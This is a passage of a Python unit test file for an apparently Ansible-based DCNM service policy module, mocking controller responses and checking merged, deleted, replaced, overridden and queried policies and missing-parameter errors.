get_policy_with_sn1, get_policy_with_sn2,
get_sn1_att_status,
create_sp1_resp,
det_sp2_sp3_resp,
deploy_sp2_sp3_resp,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp2_resp, delete_sp3_resp,
deploy_sp1_resp,
get_sn1_att_status
]
if ('test_dcnm_sp_override_with_no_config' == self._testMethodName):
get_snodes_resp = self.payloads_data.get('get_service_nodes_resp')
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
det_sp1_resp = self.payloads_data.get('detach_sp1_resp')
det_sp2_sp3_resp = self.payloads_data.get('detach_sp2_sp3_resp')
deploy_sp1_resp = self.payloads_data.get('deploy_sp1_resp')
deploy_sp2_sp3_resp = self.payloads_data.get('deploy_sp2_sp3_resp')
delete_sp1_resp = self.payloads_data.get('delete_sp1_resp')
delete_sp2_resp = self.payloads_data.get('delete_sp2_resp')
delete_sp3_resp = self.payloads_data.get('delete_sp3_resp')
get_dd_sn1_att_status = self.payloads_data.get('get_dd_sn1_att_status')
get_dd_sn2_att_status = self.payloads_data.get('get_dd_sn2_att_status')
self.run_dcnm_send.side_effect = [
get_snodes_resp,
get_policy_with_sn1, get_policy_with_sn2,
det_sp1_resp,
det_sp2_sp3_resp,
deploy_sp1_resp,
deploy_sp2_sp3_resp,
get_dd_sn1_att_status,
get_dd_sn2_att_status,
get_dd_sn2_att_status,
delete_sp1_resp, delete_sp2_resp, delete_sp3_resp,
]
if ('test_dcnm_sp_query_non_existing' == self._testMethodName):
self.run_dcnm_send.side_effect = [[],[],[]]
if ('test_dcnm_sp_query_with_service_node1' == self._testMethodName):
get_policy_with_sn1 = self.payloads_data.get('get_policy_with_sn1')
self.run_dcnm_send.side_effect = [
get_policy_with_sn1,
]
if ('test_dcnm_sp_query_with_service_node2' == self._testMethodName):
get_policy_with_sn2 = self.payloads_data.get('get_policy_with_sn2')
self.run_dcnm_send.side_effect = [
get_policy_with_sn2,
]
if ('test_dcnm_sp_query_existing_with_node_and_policy' == self._testMethodName):
have_sp1_resp = self.payloads_data.get('get_sp1_resp')
have_sp2_resp = self.payloads_data.get('get_sp2_resp')
have_sp3_resp = self.payloads_data.get('get_sp3_resp')
self.run_dcnm_send.side_effect = [
have_sp1_resp,
have_sp2_resp,
have_sp3_resp,
]
def load_fixtures(self, response=None, device=''):
# Load service policy related side-effects
self.load_sp_fixtures ()
#################################### FIXTURES END ############################
#################################### TEST-CASES ##############################
def test_dcnm_sp_merged_new (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_no_opt_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_unauth_error (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_existing_no_opt_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp2_no_opt_elems')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 2)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merged_new_check_mode (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
_ansible_check_mode=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
def test_dcnm_sp_config_without_state (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merge_no_deploy (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_merge_deploy_false (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=False,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_wrong_state(self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp7_config')
set_module_args(dict(state='wrong_state',
attach=True,
deploy=False,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=False, failed=False)
except:
self.assertEqual (result, None)
def test_dcnm_sp_merge_no_mand_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_policy_no_mand_elems')
## No dest_port
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("dest_port")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_port : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_port
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("src_port")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_port : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No proto
cfg = copy.deepcopy(self.playbook_config)
cfg[0]["policy"].pop("proto")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('proto : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No next hop
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("next_hop")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('next_hop : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No dest_network
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("dest_network")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_network : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_network
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("src_network")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_network : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No dst_vrf
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("dest_vrf")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('dest_vrf : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No src_vrf
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("src_vrf")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('src_vrf : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No RP name
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("rp_name")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('rp_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No policy name
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("name")
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
## No node name object
cfg = copy.deepcopy(self.playbook_config)
cfg[0].pop("node_name")
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=cfg))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('node_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
def test_dcnm_sp_merged_existing_and_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='merged',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 2)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 2)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_no_config (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_no_config')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_names (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_node_names')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_name_and_policy_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_with_node_name_and_rp_name (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_node_name_and_rp_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_detach_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_delete_deploy_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_delete_unauth_err (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_existing_and_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_node_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_with_name_and_no_name')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_delete_no_mand_elems (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('delete_policies_no_mand_elems')
set_module_args(dict(state='deleted',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = None
try:
result = self.execute_module(changed=True, failed=False)
except Exception as e:
self.assertEqual(('node_name : Required parameter not found' in (str(e))), True)
self.assertEqual (result, None)
def test_dcnm_sp_replace_sp1_to_sp3_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('replace_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 3)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_replace_sp1_to_sp3_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('replace_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 3)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 3)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_replace_sp1_to_sp3_existing_no_change (self):
pass
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('create_sp1_sp3_config')
set_module_args(dict(state='replaced',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_new_peerings (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_create_new')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 1)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_existing_peering (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_no_change')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_existing_peering_updated (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_modify_exist')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 2)
self.assertEqual(len(result["diff"][0]["modified"]) , 1)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 1)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_override_with_no_config (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('override_policies_no_config')
set_module_args(dict(state='overridden',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=True, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 3)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 0)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
# Validate create and deploy responses
for resp in result["response"]:
self.assertEqual(resp["RETURN_CODE"], 200)
def test_dcnm_sp_query_existing_with_node_and_policy (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_with_node_and_policy_name')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 3)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 3)
def test_dcnm_sp_query_non_existing (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_non_existing')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
self.assertEqual(len(result["diff"][0]["merged"]) , 0)
self.assertEqual(len(result["diff"][0]["deleted"]) , 0)
self.assertEqual(len(result["diff"][0]["modified"]) , 0)
self.assertEqual(len(result["diff"][0]["query"]) , 3)
self.assertEqual(len(result["diff"][0]["deploy"]) , 0)
self.assertEqual(len(result["response"]) , 0)
def test_dcnm_sp_query_with_service_node1 (self):
# load the json from playbooks
self.config_data = loadPlaybookData('dcnm_service_policy_configs')
self.payloads_data = loadPlaybookData('dcnm_service_policy_payloads')
# load required config data
self.playbook_config = self.config_data.get('query_with_node_name_sn1')
set_module_args(dict(state='query',
attach=True,
deploy=True,
fabric='mmudigon',
service_fabric='external',
config=self.playbook_config))
result = self.execute_module(changed=False, failed=False)
